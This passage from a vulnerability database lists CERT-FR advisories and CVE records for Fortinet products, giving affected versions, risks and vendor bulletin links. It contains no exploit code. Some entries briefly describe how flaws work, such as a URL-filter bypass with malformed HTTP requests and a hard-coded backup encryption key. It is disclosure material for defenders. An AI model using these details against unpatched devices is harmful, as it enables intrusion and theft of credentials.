"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-018 du 01 juin 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-018"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-20-137 du 28 mai 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-20-137"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-20-120 du 28 mai 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-20-120"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-20-199 du 01 juin 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-20-199"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-026 du 01 juin 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-026"
}
]
}
CERTFR-2021-AVI-003
Vulnerability from certfr_avis - Published: 2021-01-06 - Updated: 2021-01-06
De multiples vulnérabilités ont été découvertes dans les produits Fortinet. Elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance et une atteinte à la confidentialité des données.
Solution
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
NoneImpacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| Fortinet | FortiGate | FortiGate versions 6.2.x antérieures à 6.2.5 | ||
| Fortinet | FortiDeceptor | FortiDeceptor versions 3.1.x antérieures à 3.1.1 | ||
| Fortinet | FortiWeb | FortiWeb versions 6.2.x antérieures à 6.2.4 | ||
| Fortinet | FortiGate | FortiGate versions 6.0.x antérieures à 6.0.11 | ||
| Fortinet | FortiWeb | FortiWeb versions 6.3.x antérieures à 6.3.8 | ||
| Fortinet | FortiDeceptor | FortiDeceptor versions 3.0.x antérieures à 3.0.2 | ||
| Fortinet | FortiGate | FortiGate versions 6.4.x antérieures à 6.4.2 |
References
| Title | Publication Time | Tags | ||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "FortiGate versions 6.2.x ant\u00e9rieures \u00e0 6.2.5",
"product": {
"name": "FortiGate",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiDeceptor versions 3.1.x ant\u00e9rieures \u00e0 3.1.1",
"product": {
"name": "FortiDeceptor",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiWeb versions 6.2.x ant\u00e9rieures \u00e0 6.2.4",
"product": {
"name": "FortiWeb",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiGate versions 6.0.x ant\u00e9rieures \u00e0 6.0.11",
"product": {
"name": "FortiGate",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiWeb versions 6.3.x ant\u00e9rieures \u00e0 6.3.8",
"product": {
"name": "FortiWeb",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiDeceptor versions 3.0.x ant\u00e9rieures \u00e0 3.0.2",
"product": {
"name": "FortiDeceptor",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiGate versions 6.4.x ant\u00e9rieures \u00e0 6.4.2",
"product": {
"name": "FortiGate",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
}
],
"affected_systems_content": null,
"content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
"cves": [
{
"name": "CVE-2020-29016",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-29016"
},
{
"name": "CVE-2020-29015",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-29015"
},
{
"name": "CVE-2020-29010",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-29010"
},
{
"name": "CVE-2020-29017",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-29017"
},
{
"name": "CVE-2020-29019",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-29019"
},
{
"name": "CVE-2020-29018",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-29018"
}
],
"initial_release_date": "2021-01-06T00:00:00",
"last_revision_date": "2021-01-06T00:00:00",
"links": [],
"reference": "CERTFR-2021-AVI-003",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2021-01-06T00:00:00.000000"
}
],
"risks": [
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits\nFortinet. Elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de\ncode arbitraire \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des\ndonn\u00e9es.\n",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits Fortinet",
"vendor_advisories": [
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-20-123 du 04 janvier 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-20-123"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-20-177 du 04 janvier 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-20-177"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-20-126 du 04 janvier 2021",
"url": "https://www.fortiguard.com/psirt/%20FG-IR-20-126"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-20-125 du 04 janvier 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-20-125"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-20-103 du 04 janvier 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-20-103"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-20-124 du 04 janvier 2021",
"url": "https://www.fortiguard.com/psirt/%20FG-IR-20-124"
}
]
}
CERTFR-2020-AVI-788
Vulnerability from certfr_avis - Published: 2020-12-02 - Updated: 2020-12-02
De multiples vulnérabilités ont été découvertes dans les produits Fortinet. Elles permettent à un attaquant de provoquer un contournement de la politique de sécurité et une injection de code indirecte à distance (XSS).
Solution
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
NoneImpacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| Fortinet | FortiGate | FortiGate version 6.4.x antérieures à 6.4.2 | ||
| Fortinet | FortiClient | FortiClient versions 6.2 fonctionnant avec l'antivirus en version 6.x antérieures à 6.00137 | ||
| Fortinet | FortiOS | FortiOS versions 6.4 fonctionnant avec l'antivirus en version 6.x antérieures à 6.00144 | ||
| Fortinet | FortiGate | FortiGate version 6.2.x antérieures à 6.2.6 | ||
| Fortinet | FortiOS | FortiOS versions 6.2 fonctionnant avec l'antivirus en version 6.x antérieures à 6.00145 |
References
| Title | Publication Time | Tags | ||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "FortiGate version 6.4.x ant\u00e9rieures \u00e0 6.4.2",
"product": {
"name": "FortiGate",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiClient versions 6.2 fonctionnant avec l\u0027antivirus en version 6.x ant\u00e9rieures \u00e0 6.00137",
"product": {
"name": "FortiClient",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiOS versions 6.4 fonctionnant avec l\u0027antivirus en version 6.x ant\u00e9rieures \u00e0 6.00144",
"product": {
"name": "FortiOS",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiGate version 6.2.x ant\u00e9rieures \u00e0 6.2.6",
"product": {
"name": "FortiGate",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiOS versions 6.2 fonctionnant avec l\u0027antivirus en version 6.x ant\u00e9rieures \u00e0 6.00145",
"product": {
"name": "FortiOS",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
}
],
"affected_systems_content": null,
"content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
"cves": [
{
"name": "CVE-2020-9295",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-9295"
},
{
"name": "CVE-2020-15937",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-15937"
}
],
"initial_release_date": "2020-12-02T00:00:00",
"last_revision_date": "2020-12-02T00:00:00",
"links": [],
"reference": "CERTFR-2020-AVI-788",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2020-12-02T00:00:00.000000"
}
],
"risks": [
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits\nFortinet. Elles permettent \u00e0 un attaquant de provoquer un contournement\nde la politique de s\u00e9curit\u00e9 et une injection de code indirecte \u00e0\ndistance (XSS).\n",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits Fortinet",
"vendor_advisories": [
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-20-037 du 2 d\u00e9cembre 2020",
"url": "https://www.fortiguard.com/psirt/FG-IR-20-037"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-20-068 du 2 d\u00e9cembre 2020",
"url": "https://www.fortiguard.com/psirt/FG-IR-20-068"
}
]
}
CERTFR-2020-AVI-595
Vulnerability from certfr_avis - Published: 2020-09-24 - Updated: 2020-09-24
De multiples vulnérabilités ont été découvertes dans les produits Fortinet. Elles permettent à un attaquant de provoquer un contournement de la politique de sécurité et une injection de code indirecte à distance (XSS).
Solution
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
NoneImpacted products
References
| Title | Publication Time | Tags | ||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "FortiGate 6.2.x toutes versions",
"product": {
"name": "FortiGate",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiGate 6.4.x versions ant\u00e9rieures \u00e0 6.4.1",
"product": {
"name": "FortiGate",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiNAC versions ant\u00e9rieures \u00e0 8.7.3",
"product": {
"name": "FortiNAC",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
}
],
"affected_systems_content": null,
"content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
"cves": [
{
"name": "CVE-2020-12818",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-12818"
},
{
"name": "CVE-2020-12816",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-12816"
}
],
"initial_release_date": "2020-09-24T00:00:00",
"last_revision_date": "2020-09-24T00:00:00",
"links": [],
"reference": "CERTFR-2020-AVI-595",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2020-09-24T00:00:00.000000"
}
],
"risks": [
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits\nFortinet. Elles permettent \u00e0 un attaquant de provoquer un contournement\nde la politique de s\u00e9curit\u00e9 et une injection de code indirecte \u00e0\ndistance (XSS).\n",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits Fortinet",
"vendor_advisories": [
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-20-033 du 23 septembre 2020",
"url": "https://www.fortiguard.com/psirt/FG-IR-20-033"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-20-002 du 23 septembre 2020",
"url": "https://www.fortiguard.com/psirt/FG-IR-20-002"
}
]
}
CERTFR-2019-AVI-589
Vulnerability from certfr_avis - Published: 2019-11-25 - Updated: 2019-11-26
Une vulnérabilité a été découverte dans Fortinet FortiGate. Elles permet à un attaquant de provoquer une injection de code indirecte à distance (XSS).
Solution
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
NoneImpacted products
References
| Title | Publication Time | Tags | |||
|---|---|---|---|---|---|
|
|||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "FortiGate versions ant\u00e9rieures \u00e0 6.0.7",
"product": {
"name": "FortiGate",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiGate versions 6.2.x ant\u00e9rieures \u00e0 6.2.2",
"product": {
"name": "FortiGate",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
}
],
"affected_systems_content": null,
"content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
"cves": [
{
"name": "CVE-2019-6697",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-6697"
}
],
"initial_release_date": "2019-11-25T00:00:00",
"last_revision_date": "2019-11-26T00:00:00",
"links": [],
"reference": "CERTFR-2019-AVI-589",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2019-11-25T00:00:00.000000"
},
{
"description": "Fortinet a retir\u00e9 l\u0027espace de l\u0027URL de son bulletin de s\u00e9curit\u00e9",
"revision_date": "2019-11-26T00:00:00.000000"
}
],
"risks": [
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
}
],
"summary": "Une vuln\u00e9rabilit\u00e9 a \u00e9t\u00e9 d\u00e9couverte dans Fortinet FortiGate. Elles permet\n\u00e0 un attaquant de provoquer une injection de code indirecte \u00e0 distance\n(XSS).\n",
"title": "Vuln\u00e9rabilit\u00e9 dans Fortinet FortiGate",
"vendor_advisories": [
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-19-184 du 25 novembre 2019",
"url": "https://fortiguard.com/psirt/FG-IR-19-184"
}
]
}
CERTFR-2016-AVI-283
Vulnerability from certfr_avis - Published: 2016-08-18 - Updated: 2016-08-23
Une vulnérabilité a été corrigée dans le micrologiciel Fortigate de Fortinet. Elle permet à un attaquant de provoquer une exécution de code arbitraire à distance.
Solution
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
NoneImpacted products
References
| Title | Publication Time | Tags | ||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "FortiGate (FOS) versions ant\u00e9rieures \u00e0 4.3.9",
"product": {
"name": "FortiGate",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "La migration vers une version 5.x de FortiGate (FOS) est cependant recommand\u00e9e lorsque celle-ci est possible",
"product": {
"name": "FortiGate",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
}
],
"affected_systems_content": null,
"content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
"cves": [
{
"name": "CVE-2016-6909",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-6909"
}
],
"initial_release_date": "2016-08-18T00:00:00",
"last_revision_date": "2016-08-23T00:00:00",
"links": [
{
"title": "R\u00e8gle de d\u00e9tection r\u00e9seau Emerging Threats",
"url": "http://docs.emergingthreats.net/bin/view/Main/2023075"
}
],
"reference": "CERTFR-2016-AVI-283",
"revisions": [
{
"description": "version initiale.",
"revision_date": "2016-08-18T00:00:00.000000"
},
{
"description": "ajout CVE-2016-6909.",
"revision_date": "2016-08-23T00:00:00.000000"
}
],
"risks": [
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
}
],
"summary": "Une vuln\u00e9rabilit\u00e9 a \u00e9t\u00e9 corrig\u00e9e dans \u003cspan class=\"textit\"\u003ele\nmicrologiciel Fortigate de Fortinet\u003c/span\u003e. Elle permet \u00e0 un attaquant\nde provoquer une ex\u00e9cution de code arbitraire \u00e0 distance.\n",
"title": "Vuln\u00e9rabilit\u00e9 dans le micrologiciel Fortigate de Fortinet",
"vendor_advisories": [
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-16-023 du 17 ao\u00fbt 2016",
"url": "http://fortiguard.com/advisory/FG-IR-16-023"
}
]
}
CVE-2019-15705 (GCVE-0-2019-15705)
Vulnerability from nvd – Published: 2019-11-27 20:38 – Updated: 2024-10-25 14:27
VLAI?
Summary
An Improper Input Validation vulnerability in the SSL VPN portal of FortiOS versions 6.2.1 and below, and 6.0.6 and below may allow an unauthenticated remote attacker to crash the SSL VPN service by sending a crafted POST request.
Severity ?
No CVSS data available.
CWE
- Denial of Service
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T00:56:22.357Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://fortiguard.com/advisory/FG-IR-19-236"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2019-15705",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-10-24T20:09:51.320087Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-10-25T14:27:42.720Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "FortiGate",
"vendor": "Fortinet",
"versions": [
{
"status": "affected",
"version": "FortiOS versions 6.2.1 and below"
},
{
"status": "affected",
"version": "FortiOS versions 6.0.6 and below"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An Improper Input Validation vulnerability in the SSL VPN portal of FortiOS versions 6.2.1 and below, and 6.0.6 and below may allow an unauthenticated remote attacker to crash the SSL VPN service by sending a crafted POST request."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Denial of Service",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-11-27T20:38:54",
"orgId": "6abe59d8-c742-4dff-8ce8-9b0ca1073da8",
"shortName": "fortinet"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://fortiguard.com/advisory/FG-IR-19-236"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "psirt@fortinet.com",
"ID": "CVE-2019-15705",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "FortiGate",
"version": {
"version_data": [
{
"version_value": "FortiOS versions 6.2.1 and below"
},
{
"version_value": "FortiOS versions 6.0.6 and below"
}
]
}
}
]
},
"vendor_name": "Fortinet"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "An Improper Input Validation vulnerability in the SSL VPN portal of FortiOS versions 6.2.1 and below, and 6.0.6 and below may allow an unauthenticated remote attacker to crash the SSL VPN service by sending a crafted POST request."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Denial of Service"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://fortiguard.com/advisory/FG-IR-19-236",
"refsource": "CONFIRM",
"url": "https://fortiguard.com/advisory/FG-IR-19-236"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "6abe59d8-c742-4dff-8ce8-9b0ca1073da8",
"assignerShortName": "fortinet",
"cveId": "CVE-2019-15705",
"datePublished": "2019-11-27T20:38:54",
"dateReserved": "2019-08-27T00:00:00",
"dateUpdated": "2024-10-25T14:27:42.720Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2019-6693 (GCVE-0-2019-6693)
Vulnerability from nvd – Published: 2019-11-21 15:08 – Updated: 2025-10-21 23:35
VLAI?
Summary
Use of a hard-coded cryptographic key to cipher sensitive data in FortiOS configuration backup file may allow an attacker with access to the backup file to decipher the sensitive data, via knowledge of the hard-coded key. The aforementioned sensitive data includes users' passwords (except the administrator's password), private keys' passphrases and High Availability password (when set).
Severity ?
6.5 (Medium)
CWE
- Information disclosure
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T20:31:03.455Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://fortiguard.com/advisory/FG-IR-19-007"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2019-6693",
"options": [
{
"Exploitation": "active"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-06-24T03:55:38.395266Z",
"version": "2.0.3"
},
"type": "ssvc"
}
},
{
"other": {
"content": {
"dateAdded": "2025-06-25",
"reference": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2019-6693"
},
"type": "kev"
}
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-798",
"description": "CWE-798 Use of Hard-coded Credentials",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-10-21T23:35:57.795Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"government-resource"
],
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2019-6693"
}
],
"timeline": [
{
"lang": "en",
"time": "2025-06-25T00:00:00+00:00",
"value": "CVE-2019-6693 added to CISA KEV"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "FortiGate",
"vendor": "Fortinet",
"versions": [
{
"status": "affected",
"version": "5.6.9 and below"
},
{
"status": "affected",
"version": "6.0.5 and below"
},
{
"status": "affected",
"version": "6.2.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Use of a hard-coded cryptographic key to cipher sensitive data in FortiOS configuration backup file may allow an attacker with access to the backup file to decipher the sensitive data, via knowledge of the hard-coded key. The aforementioned sensitive data includes users\u0027 passwords (except the administrator\u0027s password), private keys\u0027 passphrases and High Availability password (when set)."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Information disclosure",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-11-21T15:08:05.000Z",
"orgId": "6abe59d8-c742-4dff-8ce8-9b0ca1073da8",
"shortName": "fortinet"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://fortiguard.com/advisory/FG-IR-19-007"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "psirt@fortinet.com",
"ID": "CVE-2019-6693",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "FortiGate",
"version": {
"version_data": [
{
"version_value": "5.6.9 and below"
},
{
"version_value": "6.0.5 and below"
},
{
"version_value": "6.2.0"
}
]
}
}
]
},
"vendor_name": "Fortinet"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Use of a hard-coded cryptographic key to cipher sensitive data in FortiOS configuration backup file may allow an attacker with access to the backup file to decipher the sensitive data, via knowledge of the hard-coded key. The aforementioned sensitive data includes users\u0027 passwords (except the administrator\u0027s password), private keys\u0027 passphrases and High Availability password (when set)."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Information disclosure"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://fortiguard.com/advisory/FG-IR-19-007",
"refsource": "CONFIRM",
"url": "https://fortiguard.com/advisory/FG-IR-19-007"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "6abe59d8-c742-4dff-8ce8-9b0ca1073da8",
"assignerShortName": "fortinet",
"cveId": "CVE-2019-6693",
"datePublished": "2019-11-21T15:08:05.000Z",
"dateReserved": "2019-01-23T00:00:00.000Z",
"dateUpdated": "2025-10-21T23:35:57.795Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2005-3058 (GCVE-0-2005-3058)
Vulnerability from nvd – Published: 2006-02-14 19:00 – Updated: 2024-08-07 22:53
VLAI?
Summary
Interpretation conflict in Fortinet FortiGate 2.8, running FortiOS 2.8MR10 and v3beta, allows remote attackers to bypass the URL blocker via an (1) HTTP request terminated with a line feed (LF) and not carriage return line feed (CRLF) or (2) HTTP request with no Host field, which is still processed by most web servers without violating RFC2616.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T22:53:30.384Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20060213 URL filter bypass in Fortinet",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-February/042140.html"
},
{
"name": "20060213 URL filter bypass in Fortinet",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/424858/100/0/threaded"
},
{
"name": "fortinet-web-filter-bypass(24626)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/24626"
},
{
"name": "16599",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/16599"
},
{
"name": "18844",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/18844"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.fortiguard.com/advisory/FGA-2006-10.html"
},
{
"name": "ADV-2006-0539",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2006/0539"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2006-02-13T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Interpretation conflict in Fortinet FortiGate 2.8, running FortiOS 2.8MR10 and v3beta, allows remote attackers to bypass the URL blocker via an (1) HTTP request terminated with a line feed (LF) and not carriage return line feed (CRLF) or (2) HTTP request with no Host field, which is still processed by most web servers without violating RFC2616."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-19T14:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20060213 URL filter bypass in Fortinet",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-February/042140.html"
},
{
"name": "20060213 URL filter bypass in Fortinet",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/424858/100/0/threaded"
},
{
"name": "fortinet-web-filter-bypass(24626)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/24626"
},
{
"name": "16599",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/16599"
},
{
"name": "18844",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/18844"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.fortiguard.com/advisory/FGA-2006-10.html"
},
{
"name": "ADV-2006-0539",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
